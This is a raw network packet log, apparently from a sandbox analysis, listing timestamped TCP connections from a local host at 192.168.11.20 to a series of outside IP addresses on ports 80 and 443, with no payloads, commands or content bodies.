                                                                                                                                                    Nov 29, 2021 14:05:26.791321993 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.791604042 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.791673899 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.791707993 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.791739941 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.791884899 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.791909933 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.792241096 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.792388916 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.792514086 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.792887926 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.793185949 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.793279886 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.793447018 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.793595076 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.793654919 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.793953896 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.794203043 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.794207096 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.794250011 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.794377089 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.794469118 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.794585943 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.794702053 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.794750929 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.794760942 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.795000076 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:06:54.393889904 CET4981280192.168.11.2050.62.172.157
                                                                                                                                                    Nov 29, 2021 14:06:54.561172009 CET804981250.62.172.157192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:06:54.561418056 CET4981280192.168.11.2050.62.172.157
                                                                                                                                                    Nov 29, 2021 14:06:54.561465979 CET4981280192.168.11.2050.62.172.157
                                                                                                                                                    Nov 29, 2021 14:06:54.768085957 CET804981250.62.172.157192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:06:55.066414118 CET4981280192.168.11.2050.62.172.157
                                                                                                                                                    Nov 29, 2021 14:06:55.234136105 CET804981250.62.172.157192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:06:55.234369040 CET4981280192.168.11.2050.62.172.157
                                                                                                                                                    Nov 29, 2021 14:07:05.630383968 CET4981380192.168.11.20199.59.242.153
                                                                                                                                                    Nov 29, 2021 14:07:05.723051071 CET8049813199.59.242.153192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.723340988 CET4981380192.168.11.20199.59.242.153
                                                                                                                                                    Nov 29, 2021 14:07:05.723401070 CET4981380192.168.11.20199.59.242.153
                                                                                                                                                    Nov 29, 2021 14:07:05.816252947 CET8049813199.59.242.153192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.817553043 CET8049813199.59.242.153192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.817631960 CET8049813199.59.242.153192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.817682981 CET8049813199.59.242.153192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:05.818031073 CET4981380192.168.11.20199.59.242.153
                                                                                                                                                    Nov 29, 2021 14:07:05.818135023 CET4981380192.168.11.20199.59.242.153
                                                                                                                                                    Nov 29, 2021 14:07:16.496157885 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.667465925 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:16.667727947 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.667834997 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:16.839644909 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.170830011 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.304024935 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.304079056 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.304218054 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.304270983 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.313054085 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.313241005 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:17.342535019 CET8049815164.155.212.139192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:17.342780113 CET4981580192.168.11.20164.155.212.139
                                                                                                                                                    Nov 29, 2021 14:07:22.532157898 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.543171883 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.543386936 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.543446064 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.554408073 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.843972921 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844050884 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844106913 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844146967 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.844369888 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.844484091 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.857911110 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.857976913 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.858022928 CET804981635.244.144.199192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:22.858273983 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.858334064 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:22.858346939 CET4981680192.168.11.2035.244.144.199
                                                                                                                                                    Nov 29, 2021 14:07:38.861797094 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.005481005 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.005810022 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.005892992 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.161848068 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.161941051 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162003994 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162050962 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:39.162307978 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.162379980 CET4981780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:07:39.306080103 CET8049817216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.190640926 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.205166101 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.205355883 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.205419064 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.219970942 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220025063 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220061064 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:44.220303059 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.220355034 CET4981880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:07:44.234875917 CET804981888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.453260899 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.612102985 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.612317085 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.612411022 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.774852991 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.774925947 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:07:49.775254965 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.775356054 CET4981980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:07:49.933950901 CET8049819172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.157622099 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.169008017 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.169368982 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.169428110 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.180783987 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340312958 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340364933 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:05.340609074 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.340650082 CET4982080192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:08:05.351778984 CET804982034.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.633732080 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.764815092 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.765036106 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.765151024 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.895849943 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.895956993 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.896008015 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:30.896305084 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:30.896374941 CET4982180192.168.11.2034.237.47.210
                                                                                                                                                    Nov 29, 2021 14:08:31.027067900 CET804982134.237.47.210192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.952833891 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.961817026 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.962059975 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.962162971 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.971064091 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971302986 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971347094 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:40.971628904 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.971666098 CET4982380192.168.11.20192.0.78.24
                                                                                                                                                    Nov 29, 2021 14:08:40.980632067 CET8049823192.0.78.24192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.174348116 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.448534966 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.448755026 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.448832035 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.724001884 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.724055052 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:46.724332094 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:46.724368095 CET4982480192.168.11.20203.170.80.250
                                                                                                                                                    Nov 29, 2021 14:08:47.000067949 CET8049824203.170.80.250192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.099611998 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.261625051 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.261850119 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.261940002 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.430764914 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.430877924 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.430958986 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431011915 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431021929 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431061983 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:08:52.431329966 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431376934 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.431396008 CET4982580192.168.11.20136.143.191.204
                                                                                                                                                    Nov 29, 2021 14:08:52.593358994 CET8049825136.143.191.204192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.695481062 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.706500053 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.706729889 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.706785917 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.717880964 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814063072 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814126968 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:02.814455986 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:02.814560890 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:03.116195917 CET4982680192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:03.127361059 CET804982634.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:17.925971031 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.060137987 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.060365915 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.060452938 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.191836119 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.201647043 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.201736927 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.201790094 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:18.202285051 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.202390909 CET4982780192.168.11.20216.172.172.87
                                                                                                                                                    Nov 29, 2021 14:09:18.333739042 CET8049827216.172.172.87192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:23.206711054 CET4982880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:09:23.221374989 CET804982888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:23.221591949 CET4982880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:09:23.221726894 CET4982880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:09:23.236151934 CET804982888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:23.236248016 CET804982888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:23.236287117 CET804982888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:23.236529112 CET4982880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:09:23.236562967 CET4982880192.168.11.2088.99.22.5
                                                                                                                                                    Nov 29, 2021 14:09:23.251104116 CET804982888.99.22.5192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:28.252522945 CET4982980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:09:28.412584066 CET8049829172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:28.412805080 CET4982980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:09:28.412970066 CET4982980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:09:28.576642036 CET8049829172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:28.576706886 CET8049829172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:28.577075958 CET4982980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:09:28.577173948 CET4982980192.168.11.20172.120.157.187
                                                                                                                                                    Nov 29, 2021 14:09:28.737442970 CET8049829172.120.157.187192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:38.899374962 CET4983080192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:09:39.069562912 CET804983066.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:39.069791079 CET4983080192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:09:39.069895983 CET4983080192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:09:39.239577055 CET804983066.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:39.330734968 CET804983066.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:39.330797911 CET804983066.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:39.330964088 CET4983080192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:09:41.076975107 CET4983080192.168.11.2066.29.140.185
                                                                                                                                                    Nov 29, 2021 14:09:41.247332096 CET804983066.29.140.185192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.807683945 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.816987038 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.817177057 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.819690943 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.819760084 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.819823027 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.819868088 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.829001904 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.829063892 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.829121113 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.829257965 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.829427004 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.829701900 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.829946995 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.830039978 CET4983280192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.831340075 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831454039 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831537962 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831576109 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831584930 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.831608057 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831649065 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831701994 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.831764936 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.831907034 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.832087040 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.839180946 CET804983234.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.840651035 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.840826988 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.842763901 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842809916 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842843056 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842874050 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842933893 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842952013 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.842966080 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.842997074 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843126059 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.843302011 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.843384027 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843426943 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843458891 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843499899 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843533993 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843565941 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843597889 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843630075 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843652964 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.843702078 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843736887 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843769073 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.843842030 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.844006062 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.852067947 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.852304935 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.854120016 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.854347944 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.854365110 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.854619980 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.854794979 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.854882956 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.854943991 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855053902 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855070114 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.855258942 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855272055 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.855333090 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855367899 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855465889 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855499983 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855530977 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855561972 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855596066 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855604887 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.855655909 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855778933 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.855900049 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855936050 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.855950117 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.855988979 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856020927 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856051922 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856082916 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856113911 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856127977 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.856173992 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.856308937 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.856479883 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.863590002 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.863825083 CET4983180192.168.11.2034.102.136.180
                                                                                                                                                    Nov 29, 2021 14:09:58.865654945 CET804983134.102.136.180192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:09:58.865739107 CET804983134.102.136.180192.168.11.20
